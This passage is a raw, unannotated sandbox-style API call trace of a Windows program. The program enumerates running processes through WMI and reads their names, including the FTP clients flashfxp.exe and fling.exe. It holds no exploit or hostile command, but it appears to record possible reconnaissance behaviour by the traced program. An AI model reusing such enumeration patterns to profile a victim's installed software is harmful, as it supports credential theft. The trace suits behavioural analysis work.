Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.159] IUnknown:Release (This=0x551f274) returned 0x3 [0265.159] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.160] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.160] IUnknown:QueryInterface (in: This=0x551f270, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.160] IUnknown:Release (This=0x551f270) returned 0x2 [0265.160] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.160] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.160] IUnknown:QueryInterface (in: This=0x551f270, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551f270) returned 0x0 [0265.160] IUnknown:AddRef (This=0x551f270) returned 0x4 [0265.160] IUnknown:Release (This=0x551f270) returned 0x3 [0265.160] IUnknown:Release (This=0x551f270) returned 0x2 [0265.160] CoTaskMemFree (pv=0x54ba2c8) [0265.160] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.160] IUnknown:AddRef (This=0x551f270) returned 0x3 [0265.160] IWbemClassObject:Get (in: This=0x551f270, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.160] IWbemClassObject:Get (in: This=0x551f270, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3304\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.161] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3304\"") returned 0x5e [0265.161] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3304\"") returned 0x5e [0265.161] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.161] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.161] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.161] IUnknown:Release (This=0x601a94) returned 0x1 [0265.162] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.162] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.162] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x55154c8) returned 0x0 [0265.163] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x55154c8) returned 0x0 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.163] WbemDefPath:IUnknown:AddRef (This=0x55154c8) returned 0x3 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523260) returned 0x0 [0265.163] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523260, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.163] WbemDefPath:IUnknown:Release (This=0x5523260) returned 0x3 [0265.163] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.163] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.163] WbemDefPath:IUnknown:Release (This=0x55154c8) returned 0x2 [0265.164] WbemDefPath:IUnknown:Release (This=0x55154c8) returned 0x1 [0265.164] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.164] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x55154c8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x55154c8) returned 0x0 [0265.164] WbemDefPath:IUnknown:AddRef (This=0x55154c8) returned 0x3 [0265.164] WbemDefPath:IUnknown:Release (This=0x55154c8) returned 0x2 [0265.164] WbemDefPath:IWbemPath:SetText (This=0x55154c8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3304\"") returned 0x0 [0265.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.164] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.164] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.164] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.164] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.164] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.164] IWbemClassObject:Get (in: This=0x551f270, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d8190*=0, plFlavor=0x23d8194*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x23d8190*=8, plFlavor=0x23d8194*=0) returned 0x0 [0265.164] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0265.164] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0265.165] IWbemClassObject:Get (in: This=0x551f270, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d8190*=8, plFlavor=0x23d8194*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="flashfxp.exe", varVal2=0x0), pType=0x23d8190*=8, plFlavor=0x23d8194*=0) returned 0x0 [0265.165] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0265.165] SysStringByteLen (bstr="flashfxp.exe") returned 0x18 [0265.165] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.165] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x551f0d8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.166] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551f0d8) returned 0x0 [0265.166] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.166] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.166] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.167] IUnknown:AddRef (This=0x551f0d8) returned 0x3 [0265.167] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.167] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.167] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551f0dc) returned 0x0 [0265.167] IMarshal:GetUnmarshalClass (in: This=0x551f0dc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.167] IUnknown:Release (This=0x551f0dc) returned 0x3 [0265.167] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.167] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.167] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.167] IUnknown:Release (This=0x551f0d8) returned 0x2 [0265.167] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.167] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.167] IUnknown:QueryInterface (in: This=0x551f0d8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551f0d8) returned 0x0 [0265.167] IUnknown:AddRef (This=0x551f0d8) returned 0x4 [0265.167] IUnknown:Release (This=0x551f0d8) returned 0x3 [0265.167] IUnknown:Release (This=0x551f0d8) returned 0x2 [0265.167] CoTaskMemFree (pv=0x54ba2c8) [0265.167] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.168] IUnknown:AddRef (This=0x551f0d8) returned 0x3 [0265.168] IWbemClassObject:Get (in: This=0x551f0d8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.168] IWbemClassObject:Get (in: This=0x551f0d8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3180\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.168] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3180\"") returned 0x5e [0265.168] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3180\"") returned 0x5e [0265.168] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.168] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.168] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.168] IUnknown:Release (This=0x601a94) returned 0x1 [0265.169] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba1d8) returned 0x0 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba1d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.170] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba1d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515538) returned 0x0 [0265.170] WbemDefPath:IUnknown:Release (This=0x54ba1d8) returned 0x0 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515538) returned 0x0 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.170] WbemDefPath:IUnknown:AddRef (This=0x5515538) returned 0x3 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.170] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523050) returned 0x0 [0265.172] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523050, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.172] WbemDefPath:IUnknown:Release (This=0x5523050) returned 0x3 [0265.172] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.172] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.172] WbemDefPath:IUnknown:Release (This=0x5515538) returned 0x2 [0265.172] WbemDefPath:IUnknown:Release (This=0x5515538) returned 0x1 [0265.172] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.172] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515538, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515538) returned 0x0 [0265.172] WbemDefPath:IUnknown:AddRef (This=0x5515538) returned 0x3 [0265.172] WbemDefPath:IUnknown:Release (This=0x5515538) returned 0x2 [0265.172] WbemDefPath:IWbemPath:SetText (This=0x5515538, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3180\"") returned 0x0 [0265.172] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.172] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.172] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.173] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.173] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.173] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.173] IWbemClassObject:Get (in: This=0x551f0d8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d8a24*=0, plFlavor=0x23d8a28*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x23d8a24*=8, plFlavor=0x23d8a28*=0) returned 0x0 [0265.173] SysStringByteLen (bstr="fling.exe") returned 0x12 [0265.173] SysStringByteLen (bstr="fling.exe") returned 0x12 [0265.173] IWbemClassObject:Get (in: This=0x551f0d8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d8a24*=8, plFlavor=0x23d8a28*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x23d8a24*=8, plFlavor=0x23d8a28*=0) returned 0x0 [0265.173] SysStringByteLen (bstr="fling.exe") returned 0x12 [0265.173] SysStringByteLen (bstr="fling.exe") returned 0x12 [0265.173] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.173] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x55203f8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.174] IUnknown:QueryInterface (in: This=0x55203f8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x55203f8) returned 0x0 [0265.175] IUnknown:QueryInterface (in: This=0x55203f8, 